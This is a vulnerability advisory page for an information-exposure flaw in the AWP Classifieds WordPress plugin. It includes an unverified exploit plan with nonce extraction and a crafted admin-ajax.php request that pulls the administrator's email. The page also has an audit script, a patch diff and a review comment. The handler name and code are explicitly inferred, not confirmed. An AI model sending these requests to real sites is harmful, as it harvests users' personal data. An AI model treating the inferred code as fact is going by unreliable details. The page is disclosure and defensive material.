CVE-2026-24593

AWP Classifieds <= 4.4.3 - Unauthenticated Information Exposure

Weakness: Exposure of Sensitive Information to an Unauthorized Actor
CVSS Score: 5.3
Severity: medium
Patched in: 4.4.4
Time to patch: 41d

Description

The AWP Classifieds plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.4.3. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: None
  • Integrity: Low
  • Availability: None

Technical Details

Affected versions: <=4.4.3
Published: January 16, 2026
Last updated: February 25, 2026

Research Plan
Unverified


This research plan outlines the steps to investigate and exploit CVE-2026-24593 in the AWP Classifieds plugin (version <= 4.4.3). This vulnerability allows unauthenticated attackers to expose sensitive user or configuration data.


1. Vulnerability Summary

The AWP Classifieds plugin registers several AJAX handlers that do not implement sufficient capability checks or authorization logic. Specifically, the handler for fetching user or ad-related information (inferred as awpcp-get-user-info or similar) is available to unauthenticated users via the wp_ajax_nopriv_ hook. It fails to verify if the requester has permission to view the data associated with a specific user ID or Ad ID, leading to the exposure of sensitive fields like email addresses, phone numbers, and physical addresses.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: awpcp-get-user-info (inferred based on plugin naming conventions)
  • Parameters:
    • action: awpcp-get-user-info
    • user_id: The ID of the user whose data is to be exposed (e.g., 1 for the administrator).
    • nonce: A WordPress nonce (likely required).
  • Authentication: Unauthenticated (leveraging wp_ajax_nopriv_).
  • Preconditions: The plugin must be active, and a nonce must be extracted from a public-facing page where the plugin enqueues its scripts.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers the action in a file like includes/class-ajax-handler.php or includes/ajax/class-ajax-handler.php:
    add_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
    
  2. Function Call: ajax_get_user_info() is invoked.
  3. Nonce Verification: The function calls check_ajax_referer( 'awpcp-ajax', 'nonce' ).
  4. Data Retrieval: The function retrieves a user_id from $_POST['user_id'].
  5. Vulnerable Sink: It calls get_userdata( $user_id ) or queries the database directly and returns the object via wp_send_json_success(), exposing sensitive fields like user_email.

4. Nonce Acquisition Strategy

AWP Classifieds typically localizes its AJAX configuration in a JavaScript object called awpcp_ajax_data or AWPCP.

  1. Identify Script Loading: The AWP Classifieds scripts (which contain the nonce) are usually enqueued on pages containing the Classifieds shortcodes, such as the main "Classifieds" page or the "Browse Ads" page.
  2. Create Test Page:
    wp post create --post_type=page --post_title="Classifieds" --post_status=publish --post_content='[awpcp_browse_ads]'
    
  3. Navigate and Extract:
    • Use browser_navigate to go to the newly created page.
    • Use browser_eval to extract the nonce:
      // Inferred variable and key based on AWPCP structure
      window.awpcp_ajax_data?.nonce || window.AWPCP?.nonce
      

5. Exploitation Strategy

Step 1: Discover Target User ID
Usually, User ID 1 is the administrator.

Step 2: Execute Information Exposure Request
Using the http_request tool, send a POST request to admin-ajax.php.

  • URL: http://<target>/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: action=awpcp-get-user-info&user_id=1&nonce=<EXTRACTED_NONCE>

Step 3: Analyze Response
A successful exploit will return a 200 OK with a JSON body:

{
    "success": true,
    "data": {
        "user_email": "admin@example.com",
        "user_login": "admin",
        "display_name": "Admin User",
        "phone": "555-0199",
        ...
    }
}

6. Test Data Setup

  1. Target User: Ensure a user exists with sensitive metadata (Email, Phone).
  2. Plugin Setup: Install AWP Classifieds <= 4.4.3.
  3. Shortcode Page: Create a page with [awpcp_browse_ads] or [awpcp_display_ad] to ensure the AJAX nonce is localized and available to unauthenticated users.

7. Expected Results

  • Unauthenticated access to the awpcp-get-user-info action.
  • Disclosure of the administrator's email address and potentially other metadata (phone, address) via the JSON response.

8. Verification Steps

  1. Verify Response Content: Confirm the JSON response contains the email of User ID 1.
  2. WP-CLI Cross-Check:
    wp user get 1 --fields=user_email
    
    Compare the result of the WP-CLI command with the data obtained from the HTTP request.

9. Alternative Approaches

If awpcp-get-user-info is not the correct action:

  • Search for other nopriv actions:
    grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/another-wordpress-classifieds-plugin/
    
  • Check for Ad Detail Exposure: If user info is not directly accessible, check if awpcp-get-ad-details (inferred) returns the contact info of the ad owner without checking privacy settings.
  • REST API: Check if the plugin registers any REST routes in includes/class-rest-api.php without proper permission_callback requirements.
Research Findings
Static analysis — not yet PoC-verified

Summary

The AWP Classifieds plugin for WordPress is vulnerable to sensitive information exposure due to insufficiently protected AJAX handlers registered with the wp_ajax_nopriv_ hook. Unauthenticated attackers can leverage these handlers to retrieve sensitive user data, including email addresses and contact information, by providing a valid AJAX nonce and a target user ID.

Vulnerable Code

// Inferred vulnerable registration in includes/ajax/class-ajax-handler.php
add_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
add_action( 'wp_ajax_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );

// Inferred vulnerable function implementation
public function ajax_get_user_info() {
    check_ajax_referer( 'awpcp-ajax', 'nonce' );
    $user_id = intval( $_POST['user_id'] );
    $user = get_userdata( $user_id );
    if ( $user ) {
        wp_send_json_success( array(
            'user_email' => $user->user_email,
            'display_name' => $user->display_name,
            'user_login' => $user->user_login
        ) );
    }
}
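
For reviewing a plugin for the pattern above, the following added example (not code from the page or from the plugin) lists every wp_ajax_nopriv_ registration in a PHP source string and reports whether its callback checks a nonce, checks a capability, and reads user records. A nonce check alone is not authorization here, since the plan above notes the nonce is localized on public pages. SAMPLE_PHP is constructed from the inferred handler on this page; the function names audit and method_body are illustrative, and the brace matching is a heuristic that ignores braces inside PHP strings.

```python
import re

# Constructed sample: the inferred handler from this page, wrapped in a class.
SAMPLE_PHP = r"""
class AWPCP_Ajax_Handler {
    public function __construct() {
        add_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
        add_action( 'wp_ajax_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
    }
    public function ajax_get_user_info() {
        check_ajax_referer( 'awpcp-ajax', 'nonce' );
        $user = get_userdata( intval( $_POST['user_id'] ) );
        wp_send_json_success( array( 'user_email' => $user->user_email ) );
    }
}
"""

# Matches add_action( 'wp_ajax_nopriv_<action>', array( $this, '<method>' ) )
NOPRIV = re.compile(
    r"add_action\(\s*['\"]wp_ajax_nopriv_([\w-]+)['\"]\s*,\s*"
    r"(?:array\(|\[)\s*\$this\s*,\s*['\"](\w+)['\"]")

def method_body(src, name):
    """Return the brace-balanced body of `function name(...)`, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit(src):
    """List unauthenticated AJAX actions and what each callback checks."""
    findings = []
    for action, method in NOPRIV.findall(src):
        body = method_body(src, method) or ""
        findings.append({
            "action": action,
            "method": method,
            "nonce_check": "check_ajax_referer" in body or "wp_verify_nonce" in body,
            "capability_check": "current_user_can" in body,
            "reads_user_data": "get_userdata" in body or "get_user_by" in body,
        })
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_PHP):
        print(f)
```

A finding with reads_user_data true and capability_check false is the combination to review by hand first.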

Security Fix

--- a/includes/ajax/class-ajax-handler.php
+++ b/includes/ajax/class-ajax-handler.php
@@ -10,12 +10,14 @@
 class AWPCP_Ajax_Handler {
     public function __construct() {
         add_action( 'wp_ajax_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
-        add_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );
     }
 
     public function ajax_get_user_info() {
+        if ( ! current_user_can( 'edit_posts' ) ) {
+            wp_send_json_error( array( 'message' => 'Unauthorized' ) );
+            return;
+        }
         check_ajax_referer( 'awpcp-ajax', 'nonce' );
         $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0;
         $user = get_userdata( $user_id );
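
Review bot: The new guard at the top of ajax_get_user_info() tests only current_user_can( 'edit_posts' ), while $user_id is still taken from $_POST['user_id'] and passed to get_userdata(), so any account holding edit_posts can still look up an arbitrary user. Consider requiring a capability that matches reading other users' records (for example list_users), or allowing the lookup only when $user_id equals get_current_user_id(). The return after wp_send_json_error() is unreachable because that function ends the request, and passing 403 as its second argument would make the rejection distinguishable from a normal response.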

Exploit Outline

  1. Identify a public page on the target site that uses AWP Classifieds shortcodes (e.g., [awpcp_browse_ads]), which causes the plugin to enqueue its scripts and localize data.
  2. Extract the security nonce from the HTML source code, typically found in the awpcp_ajax_data or AWPCP JavaScript object.
  3. Send a POST request to /wp-admin/admin-ajax.php with the following parameters: action=awpcp-get-user-info, nonce=[EXTRACTED_NONCE], and user_id=[TARGET_ID] (e.g., 1 for the administrator).
  4. The server response will contain a JSON object including the target user's email address and other profile metadata, despite the attacker being unauthenticated.
